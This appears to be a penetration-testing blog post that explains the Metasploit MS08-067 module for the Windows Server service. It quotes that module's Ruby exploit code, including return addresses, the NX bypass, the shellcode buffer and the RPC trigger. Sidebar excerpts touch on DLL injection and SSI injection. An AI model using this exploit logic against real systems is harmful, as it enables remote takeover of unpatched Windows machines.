Skip to main content

Pentest LAb 0x02


module ms08_067_netapi
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. Use google to find more public information or metasploit focused papers. Reading exploit module On backtrack5, the metasploit is deployed into /opt/framework3/msf3. You can read exploit module on dev.metasploit.com or localy in /opt/framework3/msf3/modules/exploits/windows/smb/ms08_067_netapi.rb. Main class I don’t know right Ruby terms, but what is important, try to get experience by reading eventhough you don’t know exact language syntax. When you are familiar with python or PHP it will be easy then you think.


Exploit integration starts with “Ruby class – “Metasploit3″ which is it derived from parrent class Msf::Exploit::Remote and includes some code from module Msf::Exploit::Remote, Msf::Exploit::Remote::SMB.

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
I have found definition of modules in /opt/framework3/msf3/lib/msf/core/exploit. After exploring scripts dcerpc.rb and smb.rb, they provides utility methods for interacting with a DCERPC/SMB services. There is class a constructor which sets all optional parameters we know from msfconsole (exploit description and parameters). Interesting detail is attribute target which is an array of:

'Targets' => [

# Antoine's universal for Windows 2000
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET 

[ 'Windows 2000 Universal',
{ 'Ret' => 0x001f1cb0,
   'Scratch' => 0x00020408,
} ], # JMP EDI SVCHOST.EXE

# Metasploit's NX bypass for XP SP2/SP3

[ 'Windows XP SP2 Czech (NX)',
{
 'Ret' => 0x6fe1f727,
 'DisableNX' => 0x6fe216e2,
 'Scratch' => 0x00020408
} ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
...........

Exploit method
Exploit method starts SMB session with remote victim.

def exploit
connect()
smb_login()

# Use a copy of the target
 mytarget = target

#
# Windows 2000, XP (NX), and 2003 (NO NX) mytargets
#

 if(not mytarget['RetDec'])
 jumper = Rex::Text.rand_text_alpha(70).upcase
 jumper[ 4,4] = [mytarget.ret].pack("V")
 jumper[50,8] = make_nops(8)
 jumper[58,2] = "\xeb\x62"

Jumper variable
Rex::Text is metasploit module for formating text. Method Rex::Text.rand_text_alpha(70).upcase will generate random alpha character data and convert them into uppercase. So jumper variable is random char array 70bytes long. After that some substitution follows on specific positions in jumper array.
We inject into array 4byte return address from the 4th byte. Method .pack("V") just considers string value as an 32bit integer number which is useful where we wants to operate with addresses. From 50th byte we put 8xNOP instructions. Hard to say what final bytes do “\xeb\x62″, but ok, let’s try go ahead.


Path String construction
Now reading composition of Path string will be more easy according methods we already know. We construct path string by unicode strings, random 100Byte alpha array, after that is our chosen payload which is encoded, another unicode traversal backslashes and extra padding (pad=’A').

path =
                        Rex::Text.to_unicode("\\") +

# This buffer is removed from the front
Rex::Text.rand_text_alpha(100) +

# Shellcode
payload.encoded +

# Relative path to trigger the bug
Rex::Text.to_unicode("\\..\\..\\") +

# Extra padding
Rex::Text.to_unicode(pad) +

# Writable memory location
(static) [mytarget['Scratch']].pack("V") + # EBP

# Return to code which disables NX (or just the return)
[ mytarget['DisableNX'] || mytarget.ret ].pack("V") +

# Padding with embedded jump jumper +

# NULL termination
"\x00" * 2

And now we add memory addresses into path string. One is “Scratch” (writable memory location) and jump to code which disable NX protection and goes to our jumper code. Finally we terminate string by zero char which stops action over strings (when is interpreted inside C lang functions).


Send Path string into RPC call
handle = dcerpc_handle(
'4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
)
dcerpc_bind(handle)
stub = NDR.uwstring(server) +
NDR.UnicodeConformantVaryingStringPreBuilt(path) +
NDR.long(rand(1024)) + NDR.wstring(prefix) +
NDR.long(4097) +
NDR.long(0)

# NOTE: we don't bother waiting for a response here...
print_status("Attempting to trigger the vulnerability...")
dcerpc.call(0x1f, stub, false)

# Cleanup
handler
disconnect
end

Comments

Post a Comment

Popular posts from this blog

Hacking Windows 10 UWP App: DLL Injection & common Vulnerabilities

I recently started working on  widows 10 Apps( Apps not Applications) security. Before diving deep in hacking terms lets try to understand what's new in Windows 10 UWP( Universal Platform) as compared to old Apps. Lets begin with how apps actually work on windows 10(desktop/tablet). Now windows 10 comes with a container only for running apps inside the isolated environment. By default, /APPCONTAINER(Linker Flag) is off. This option modifies an executable to indicate whether the app must be run in the appcontainer process-isolation environment. Specify /APPCONTAINER for an app that must run in the appcontainer environment—for example, a Windows Store app. (The option is set automatically in Visual Studio when you create a Windows Store app from a template.) For a desktop app, specify /APPCONTAINER:NO or just omit the option. The /APPCONTAINER option was introduced in Windows 8. Now there is no registry entry concept for these app in the System HIVE rather they install they own hiv...
5 comments
Read more

Installing vmware-11.0 on Ubuntu 15.04 Using kernel Patch

curl http://pastie.org/pastes/9934018/download -o /tmp/vmnet-3.19.patch cd /usr/lib/vmware/modules/source tar -xf vmnet.tar patch -p0 -i /tmp/vmnet-3.19.patch tar -cf vmnet.tar vmnet-only rm -r *-only vmware-modconfig --console --install-all References: http://askubuntu.com/questions/605530/vmware-player-7-1-0-on-ubuntu-15-04-kernel-3-19-0-10-generic-app-loading http://askubuntu.com/questions/617704/failed-to-build-vmnet-for-kernel-3-19
1 comment
Read more

SSI Injection Attack

SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields. It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like:  Code: < ! # = / . " - > and [a-zA-Z0-9] Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these type of pages does not mean that th...
5 comments
Read more